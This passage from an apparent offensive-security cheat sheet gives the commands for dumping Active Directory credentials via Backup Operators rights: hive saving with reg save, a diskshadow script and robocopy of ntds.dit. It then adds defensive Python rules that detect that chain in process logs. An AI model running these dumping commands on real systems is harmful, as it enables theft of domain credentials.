Specific Domain Groups

Backup Operator / SeBackupPrivilege


# If you compromise an account that is a member of the Backup Operators group,
# you can become Domain Admin without RDP or WinRM access to the Domain Controller.

# With this POC you don't need WinRM or RDP access:

.\BackupOperatorToDA.exe -h

Backup Operator to Domain Admin (by @mpgn_x64)

  This tool exist thanks to @filip_dragovic / https://github.com/Wh04m1001

Mandatory argument:
  -t <TARGET>      \\computer_name (ex: \\dc01.pouldard.wizard
  -o <PATH>        Where to store the sam / system / security files (can be UNC path)

Optional arguments:

  -u <USER>        Username
  -p <PASSWORD>    Password
  -d <DOMAIN>      Domain
  -h               help
# Manual method, mainly using WinRM

# On a workstation
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

# On a DC (locally)
nano poc.dsh
set context persistent nowriters
add volume c: alias poc
expose %poc% z:
unix2dos poc.dsh

cd C:\Temp
upload poc.dsh
diskshadow /s poc.dsh
robocopy /b z:\windows\ntds . ntds.dit

reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
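From the defender's side, the chain above leaves a recognisable trail in process-creation telemetry: `reg save` of the SAM/SYSTEM/SECURITY hives, a scripted `diskshadow /s`, and `robocopy /b` touching `ntds.dit`. The following detection logic is an added example written for this page, not code from the cheat sheet or from the BackupOperatorToDA tool; the `ProcEvent` field names are an assumption about how Sysmon EID 1 / Security 4688 records are exported, and the sample events are constructed.

```python
import shlex
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class ProcEvent:          # one process-creation record (field names assumed)
    host: str
    image: str            # full path of the created process
    cmdline: str          # command line as logged

CRED_HIVES = {"hklm\\sam", "hklm\\system", "hklm\\security"}
# (rule name, image basename, predicate over the whitespace-split command line)
RULES = [
    ("reg_save_credential_hive", "reg.exe",
     lambda t: len(t) > 2 and t[1].lower() == "save" and t[2].lower() in CRED_HIVES),
    ("diskshadow_scripted", "diskshadow.exe",
     lambda t: any(a.lower() == "/s" for a in t[1:])),
    ("robocopy_backup_mode_ntds", "robocopy.exe",
     lambda t: any(a.lower() == "/b" for a in t)
     and any("ntds" in a.lower() for a in t)),
]

def match_rules(ev):
    # posix=False keeps backslashes literal, so Windows paths survive intact
    t = shlex.split(ev.cmdline, posix=False)
    base = ev.image.rsplit("\\", 1)[-1].lower()
    return [name for name, img, pred in RULES if base == img and pred(t)]

def triage(events):
    """Rule hits per host, sorted; the full chain on one host is the signal."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev.host].update(match_rules(ev))
    return {h: sorted(r) for h, r in hits.items()}

def severity(rule_names):
    # High only when shadow copy and ntds.dit copy both appear on one host; a lone diskshadow can be a backup job
    chain = {"diskshadow_scripted", "robocopy_backup_mode_ntds"}
    if chain <= set(rule_names):
        return "high"
    return "medium" if rule_names else "none"

# Constructed sample telemetry mirroring the cheat-sheet commands above
SAMPLE = [
    ProcEvent("DC01", r"C:\Windows\System32\diskshadow.exe", "diskshadow /s poc.dsh"),
    ProcEvent("DC01", r"C:\Windows\System32\Robocopy.exe", r"robocopy /b z:\windows\ntds . ntds.dit"),
    ProcEvent("DC01", r"C:\Windows\System32\reg.exe", r"reg save hklm\system c:\Temp\system"),
    ProcEvent("WS07", r"C:\Windows\System32\Robocopy.exe", r"robocopy C:\docs D:\bak /mir"),
]
```

Note that the remote-registry path used by the POC (hives written straight to a UNC path) does not spawn reg.exe on the DC, so pair these process rules with a review of who actually sits in Backup Operators.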